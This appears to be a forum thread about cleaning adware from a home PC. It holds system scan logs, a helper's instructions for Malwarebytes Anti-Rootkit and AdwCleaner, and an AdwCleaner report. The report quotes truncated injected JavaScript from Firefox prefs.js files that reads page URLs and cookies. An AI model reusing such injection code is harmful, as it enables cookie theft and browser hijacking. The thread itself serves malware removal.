2014-06-15 19:47 - 2014-06-15 19:47 - 03000776 _____ () c:\Program Files\Optimizer Pro\OptProCrash.dll
2014-06-15 19:47 - 2014-06-15 19:47 - 00186496 _____ () c:\Program Files\Optimizer Pro\OptProCrashSvc.dll
2013-12-14 20:06 - 2014-10-26 21:28 - 38561576 _____ () C:\Program Files\Alwil Software\Avast5\libcef.dll
2014-10-26 19:56 - 2014-10-26 19:56 - 16832176 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:D1B5B4F1

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: SDTray => "C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"

========================= Accounts: ==========================

Administrator (S-1-5-21-2927482541-673307907-4085399872-500 - Administrator - Disabled) => C:\Users\Administrator
Bill (S-1-5-21-2927482541-673307907-4085399872-1004 - Administrator - Enabled) => C:\Users\Bill
Dylan (S-1-5-21-2927482541-673307907-4085399872-1007 - Administrator - Enabled) => C:\Users\Dylan
Guest (S-1-5-21-2927482541-673307907-4085399872-501 - Limited - Enabled)
Hannah (S-1-5-21-2927482541-673307907-4085399872-1002 - Administrator - Enabled) => C:\Users\Hannah
Kristi (S-1-5-21-2927482541-673307907-4085399872-1001 - Administrator - Enabled) => C:\Users\Kristi
Nick (S-1-5-21-2927482541-673307907-4085399872-1003 - Administrator - Enabled) => C:\Users\Nick
UpdatusUser (S-1-5-21-2927482541-673307907-4085399872-1006 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Faulty Device Manager Devices =============

Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/30/2014 10:20:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application plugin-container.exe, version 33.0.0.5397, time stamp 0x543924b1, faulting module mozalloc.dll, version 33.0.0.5397, time stamp 0x5438ffbb, exception code 0x80000003, fault offset 0x00001425,
process id 0x17e4, application start time 0xplugin-container.exe0.

Error: (10/28/2014 05:02:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 05:02:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 01:09:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 01:09:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 00:07:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 00:07:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/26/2014 09:47:08 PM) (Source: EventSystem) (EventID: 4621) (User: )
Description: 80070005EventSystem.EventSubscription{3D5FF3C9-BBDE-4FC0-8CA7-6D8B7030DB7F}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}

Error: (10/26/2014 09:26:26 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.


Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {ef073e62-b48c-4607-8410-c77b7817eddf}

Error: (10/26/2014 08:55:47 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.


System errors:
=============
Error: (11/01/2014 09:59:28 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:59:24 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Foxit Reader PDF Printer Driver required for printer Foxit Reader PDF Printer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:59:23 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Canon MG6100 series Printer required for printer Canon MG6100 series is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:59:22 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver CutePDF Writer required for printer CutePDF Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:51:25 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:51:24 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Foxit Reader PDF Printer Driver required for printer Foxit Reader PDF Printer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:51:22 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver CutePDF Writer required for printer CutePDF Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:51:12 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Canon MG6100 series Printer required for printer Canon MG6100 series is unknown. Contact the administrator to install the driver before you log in again.

Error: (10/28/2014 01:49:31 PM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Remote Desktop Easy Print required for printer Library 3rd Floor (redirected 4) is unknown. Contact the administrator to install the driver before you log in again.

Error: (10/28/2014 01:49:30 PM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Remote Desktop Easy Print required for printer Microsoft XPS Document Writer (redirected 4) is unknown. Contact the administrator to install the driver before you log in again.


Microsoft Office Sessions:
=========================
Error: (10/30/2014 10:20:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: plugin-container.exe33.0.0.5397543924b1mozalloc.dll33.0.0.53975438ffbb800000030000142517e401cff3e926609579

Error: (10/28/2014 05:02:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 05:02:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 01:09:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 01:09:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 00:07:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 00:07:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/26/2014 09:47:08 PM) (Source: EventSystem) (EventID: 4621) (User: )
Description: 80070005EventSystem.EventSubscription{3D5FF3C9-BBDE-4FC0-8CA7-6D8B7030DB7F}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}

Error: (10/26/2014 09:26:26 PM) (Source: VSS) (EventID: 8194) (User: )
Description: 0x80070005

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {ef073e62-b48c-4607-8410-c77b7817eddf}

Error: (10/26/2014 08:55:47 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe


CodeIntegrity Errors:
===================================
  Date: 2014-10-28 13:09:19.188
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 21:55:16.603
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 21:36:12.258
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:55:47.708
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:07:50.922



#4 Jo*

  • Malware Response Team
  • 3,319 posts
  • Gender:Male
  • Location:Germany

Posted 01 November 2014 - 12:17 PM

Hello topper8281,

Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Be sure to print out and follow the instructions provided on that same page.
  • Caution: This is a beta version so please be sure to read the disclaimer and back up all your data before using.
  • Scan your system for malware
With some infections, you may see two message boxes.
  • 'Could not load protection driver'. Click 'OK'.
  • 'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.
  • If malware is found - do not press the Clean up button, please go to the MBAR folder and then copy/paste the contents of the MBAR-log-***.txt file to your next reply.
  • If there is no malware found, please let me know as well.

***


Please download AdwCleaner by Xplode and save to your Desktop.
Double-click AdwCleaner.exe
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
    When the scan has finished, the actual line should say "Pending. Please uncheck elements you do not want to remove" => scan is complete.
  • After the scan has finished, click on the Report button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.
  • The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it.
    If you see an entry you want to keep, let me know about it.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles is saved in the C:\AdwCleaner folder, which was created when running the tool.

***


Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#5 topper8281


Posted 01 November 2014 - 01:07 PM

Although I got a warning at first about "AppInit_Dlls" when I first opened Malwarebytes Anti-Rootkit, the scan did not find any malware at all. I added a screenshot of this error to this post, though. I clicked "No" to the box that it showed me.

Now, here is the log for AdwCleaner. You didn't say whether I should remove anything or not, so I didn't. But I kept that program open on the computer after the scan finished in case you want me to.

# AdwCleaner v3.311 - Report created 01/11/2014 at 10:55:50
# Updated 30/09/2014 by Xplode
# Operating System : Windows Vista ™ Ultimate Service Pack 2 (32 bits)
# Username : Nick - WALKER-PC
# Running from : C:\Users\Nick\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****

Service Found : ca82e1a5

***** [ Files / Folders ] *****

Folder Found : C:\Program Files\Conduit
Folder Found : C:\Program Files\Optimizer Pro
Folder Found : C:\Program Files\Search Toolbar
Folder Found : C:\ProgramData\FlaashCoupon
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\optimizer pro v3.2
Folder Found : C:\ProgramData\QueenCoupioon
Folder Found : C:\ProgramData\SaalesCheckEr
Folder Found : C:\ProgramData\SaLesChheckueR
Folder Found : C:\ProgramData\SaveItCoupons
Folder Found : C:\ProgramData\Webusavveer
Folder Found : C:\Users\Bill\AppData\LocalLow\Conduit
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\ioooiaooqff@dejai.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\ioooiaooqff@dejai.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yzfw@rvhdxng.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yzfw@rvhdxng.org
Folder Found : C:\Users\Hannah\AppData\LocalLow\Conduit
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\ioooiaooqff@dejai.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\ioooiaooqff@dejai.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yzfw@rvhdxng.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yzfw@rvhdxng.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Optimizer Pro
Folder Found : C:\Users\Hannah\AppData\Roaming\Search Protection
Folder Found : C:\Users\Hannah\Documents\Optimizer Pro
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\ioooiaooqff@dejai.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\ioooiaooqff@dejai.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\TkUtuf@Yi.edu
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\TkUtuf@Yi.edu
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\TkUtuf@Yi.edu
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yzfw@rvhdxng.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yzfw@rvhdxng.org
Folder Found : C:\Users\Nick\AppData\Local\Conduit
Folder Found : C:\Users\Nick\AppData\Local\Temp\rightsurf
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\ConduitCommon
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\StumbleUpon
Folder Found : C:\Users\Nick\AppData\Roaming\registry mechanic

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Data Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~1\optimi~1\optpro~2.dll
Data Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll
Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKCU\Software\AppDataLow\Software\Conduit
Key Found : HKCU\Software\AppDataLow\Software\SmartBar
Key Found : HKCU\Software\AppDataLow\Toolbar
Key Found : HKCU\Software\IM
Key Found : HKCU\Software\ImInstaller
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Optimizer Pro_is1
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SearchProtect
Key Found : HKCU\Software\Softonic
Key Found : HKCU\Software\YahooPartnerToolbar
Key Found : HKCU\Software\Zugo
Key Found : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\Toolbar.CT3072253
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\SOFTWARE\Conduit
Key Found : HKLM\SOFTWARE\ImInstaller
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6F10CA8F-97E3-48FB-9003-3EE8E9050577}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B114619-78B7-1CFF-55EF-74266954F883}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B114619-78B7-1CFF-55EF-74266954F883}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CC17A332-9555-AD95-3985-0BDD9BF0EC71}
Key Found : HKLM\SOFTWARE\PIP

***** [ Browsers ] *****

-\\ Internet Explorer v7.0.6002.18005


-\\ Mozilla Firefox v33.0 (x86 en-US)

[ File : C:\Users\Bill\AppData\Roaming\Mozilla\Firefox\Profiles\klr418dz.default-1405037272113\prefs.js ]

Line Found : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Found : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\prefs.js ]

Line Found : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Found : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\prefs.js ]

Line Found : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
